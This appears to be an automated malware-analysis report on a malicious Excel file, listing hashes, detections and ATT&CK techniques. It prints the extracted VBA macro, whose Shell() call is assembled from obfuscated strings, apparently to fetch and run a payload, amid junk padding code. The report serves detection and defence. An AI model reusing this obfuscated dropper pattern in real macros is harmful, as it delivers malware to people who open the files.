Office (OLE) malware analysis — malicious · 71e92d9677ca26e6

MALICIOUS

Office (OLE)

150.0 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2020-09-07

MD5: 000fb5420a53732ea57cc9b898808440 SHA-1: bb581e9729554fc5adfa98ae547b1b11b40b9199 SHA-256: 71e92d9677ca26e6634abf2a38deb29499c390e840a01fd71fe956da1154400f

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros. The script attempts to construct a command by concatenating obfuscated strings, likely to download and execute a secondary payload. The ClamAV detection 'Xls.Malware.Stratos-7506050-0' further supports its malicious nature.

Heuristics 3

ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 66256 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	66256 bytes
SHA-256: `f0ccace1beb0142a6a6ae945edff5bda63bc315a925dedb941e582ac20621bb1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub ivs() ii = DBKhWzyXM("qwlxe$lxxt>``n2qt`", "4") Shell (ii + DBKhWzyXM("gjoo^yjo", "6")) End Sub Private Function pcDaYAizlpOpAuMJ() GoTo PbsGcPZxsUQDYdlbGPP PbsGcPZxsUQDYdlbGPP: End Function Private Function TqxEjwvLORJixqaIKf() GoTo PbsGcPZxsUQDYdlbGPP PbsGcPZxsUQDYdlbGPP: GoTo FSssTcoQkPoFgFQKdMjS FSssTcoQkPoFgFQKdMjS: End Function Public Function kgrIQfgqNI() GoTo PbsGcPZxsUQDYdlbGPP PbsGcPZxsUQDYdlbGPP: GoTo FSssTcoQkPoFgFQKdMjS FSssTcoQkPoFgFQKdMjS: Dim tBrQRSQVGN As Integer tBrQRSQVGN = 3 Do While tBrQRSQVGN < 30 DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1 Loop End Function Private Sub cRULlNtqZMiYOdnVVI() GoTo PbsGcPZxsUQDYdlbGPP PbsGcPZxsUQDYdlbGPP: GoTo FSssTcoQkPoFgFQKdMjS FSssTcoQkPoFgFQKdMjS: Dim tBrQRSQVGN As Integer tBrQRSQVGN = 3 Do While tBrQRSQVGN < 30 DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1 Loop If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End End Sub Public Sub lPqcswyqPsQ() GoTo PbsGcPZxsUQDYdlbGPP PbsGcPZxsUQDYdlbGPP: GoTo FSssTcoQkPoFgFQKdMjS FSssTcoQkPoFgFQKdMjS: Dim tBrQRSQVGN As Integer tBrQRSQVGN = 3 Do While tBrQRSQVGN < 30 DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1 Loop If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End Dim CtGRAznZAQjxfwimMA As Integer CtGRAznZAQjxfwimMA = "805" End Sub Private Function HeAZebmpEabkupSiB() GoTo PbsGcPZxsUQDYdlbGPP PbsGcPZxsUQDYdlbGPP: GoTo FSssTcoQkPoFgFQKdMjS FSssTcoQkPoFgFQKdMjS: Dim tBrQRSQVGN As Integer tBrQRSQVGN = 3 Do While tBrQRSQVGN < 30 DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1 Loop If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End Dim CtGRAznZAQjxfwimMA As Integer CtGRAznZAQjxfwimMA = "805" GoTo DMNLQBuBgtsIMOGgvnYF DMNLQBuBgtsIMOGgvnYF: End Function Public Function cEJYiCPDqQnmNvMzD() GoTo PbsGcPZxsUQDYdlbGPP PbsGcPZxsUQDYdlbGPP: GoTo FSssTcoQkPoFgFQKdMjS FSssTcoQkPoFgFQKdMjS: Dim tBrQRSQVGN As Integer tBrQRSQVGN = 3 Do While tBrQRSQVGN < 30 DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1 Loop If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End Dim CtGRAznZAQjxfwimMA As Integer CtGRAznZAQjxfwimMA = "805" GoTo DMNLQBuBgtsIMOGgvnYF DMNLQBuBgtsIMOGgvnYF: Dim bYuQphdpFUqenKFjl As Integer bYuQphdpFUqenKFjl = 3 Do While bYuQphdpFUqenKFjl < 35 DoEvents: bYuQphdpFUqenKFjl = bYuQphdpFUqenKFjl + 1 Loop End Function Private Sub oTdechELSwJIZdf() GoTo PbsGcPZxsUQDYdlbGPP PbsGcPZxsUQDYdlbGPP: GoTo FSssTcoQkPoFgFQKdMjS FSssTcoQkPoFgFQKdMjS: Dim tBrQRSQVGN As Integer tBrQRSQVGN = 3 Do While tBrQRSQVGN < 30 DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1 Loop If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End Dim CtGRAznZAQjxfwimMA As Integer CtGRAznZAQjxfwimMA = "805" GoTo DMNLQBuBgtsIMOGgvnYF DMNLQBuBgtsIMOGgvnYF: Dim bYuQphdpFUqenKFjl As Integer bYuQphdpFUqenKFjl = 3 Do While bYuQphdpFUqenKFjl < 35 DoEvents: bYuQphdpFUqenKFjl = bYuQphdpFUqenKFjl + 1 Loop If "oVYtVaokShGGhqCf" = "eBTtTfZraxhrxtF" Then End End Sub Private Sub lsuDbVzBioHPFlggfkUc() GoTo PbsGcPZxsUQDYdlbGPP PbsGcPZxsUQDYdlbGPP: GoTo FSssTcoQkPoFgFQKdMjS FSssTcoQkPoFgFQKdMjS: Dim tBrQRSQVGN As Integer tBrQRSQVGN = 3 Do While tBrQRSQVGN < 30 DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1 Loop If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End Dim CtGRAznZAQjxfwimMA As Integer CtGRAznZAQjxfwimMA = "805" GoTo DMNLQBuBgtsIMOGgvnYF DMNLQBuBgtsIMOGgvnYF: Dim bYuQphdpFUqenKFjl As Integer bYuQphdpFUqenKFjl = 3 Do While bYuQphdpFUqenKFjl < 35 DoEvents: bYuQphdpFUqenKFjl = bYuQphdpFUqenKFjl + 1 Loop If "oVYtVaokShGGhqCf" = "eBTtTfZraxhrxtF" Then End GoTo pfiaycGEmb pfiaycGEmb: End Sub Public Function mdqAkjQQxGSvOu() GoTo PbsGcPZxsUQDYdlbGPP PbsGcPZxsUQDYdlbGPP: GoTo FSssTcoQkPoFgFQKdMjS FSssTcoQkPoFgFQKdMjS: Dim tBrQRSQVGN As Integer tBrQRSQVGN = 3 Do While tBrQRSQVGN < 30 DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1 Loop If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End Dim CtGRAznZAQjxfwimMA As Integer CtGRAznZAQjxfwimMA = "805" GoTo DMNLQBuBgtsIMOGgvnYF DMNLQBuBgtsIMOGgvnYF: Dim bY ... (truncated)

SHA-256: f0ccace1beb0142a6a6ae945edff5bda63bc315a925dedb941e582ac20621bb1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub ivs()

ii = DBKhWzyXM("qwlxe$lxxt>``n2qt`", "4")

Shell (ii + DBKhWzyXM("gjoo^yjo", "6"))

End Sub
Private Function pcDaYAizlpOpAuMJ()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:

End Function
Private Function TqxEjwvLORJixqaIKf()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:

End Function
Public Function kgrIQfgqNI()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop

End Function
Private Sub cRULlNtqZMiYOdnVVI()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End

End Sub
Public Sub lPqcswyqPsQ()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End
Dim CtGRAznZAQjxfwimMA As Integer
CtGRAznZAQjxfwimMA = "805"

End Sub
Private Function HeAZebmpEabkupSiB()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End
Dim CtGRAznZAQjxfwimMA As Integer
CtGRAznZAQjxfwimMA = "805"
GoTo DMNLQBuBgtsIMOGgvnYF
DMNLQBuBgtsIMOGgvnYF:

End Function
Public Function cEJYiCPDqQnmNvMzD()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End
Dim CtGRAznZAQjxfwimMA As Integer
CtGRAznZAQjxfwimMA = "805"
GoTo DMNLQBuBgtsIMOGgvnYF
DMNLQBuBgtsIMOGgvnYF:
Dim bYuQphdpFUqenKFjl As Integer
bYuQphdpFUqenKFjl = 3
Do While bYuQphdpFUqenKFjl < 35
   DoEvents: bYuQphdpFUqenKFjl = bYuQphdpFUqenKFjl + 1
Loop

End Function
Private Sub oTdechELSwJIZdf()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End
Dim CtGRAznZAQjxfwimMA As Integer
CtGRAznZAQjxfwimMA = "805"
GoTo DMNLQBuBgtsIMOGgvnYF
DMNLQBuBgtsIMOGgvnYF:
Dim bYuQphdpFUqenKFjl As Integer
bYuQphdpFUqenKFjl = 3
Do While bYuQphdpFUqenKFjl < 35
   DoEvents: bYuQphdpFUqenKFjl = bYuQphdpFUqenKFjl + 1
Loop
If "oVYtVaokShGGhqCf" = "eBTtTfZraxhrxtF" Then End

End Sub
Private Sub lsuDbVzBioHPFlggfkUc()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End
Dim CtGRAznZAQjxfwimMA As Integer
CtGRAznZAQjxfwimMA = "805"
GoTo DMNLQBuBgtsIMOGgvnYF
DMNLQBuBgtsIMOGgvnYF:
Dim bYuQphdpFUqenKFjl As Integer
bYuQphdpFUqenKFjl = 3
Do While bYuQphdpFUqenKFjl < 35
   DoEvents: bYuQphdpFUqenKFjl = bYuQphdpFUqenKFjl + 1
Loop
If "oVYtVaokShGGhqCf" = "eBTtTfZraxhrxtF" Then End
GoTo pfiaycGEmb
pfiaycGEmb:

End Sub
Public Function mdqAkjQQxGSvOu()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End
Dim CtGRAznZAQjxfwimMA As Integer
CtGRAznZAQjxfwimMA = "805"
GoTo DMNLQBuBgtsIMOGgvnYF
DMNLQBuBgtsIMOGgvnYF:
Dim bY
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.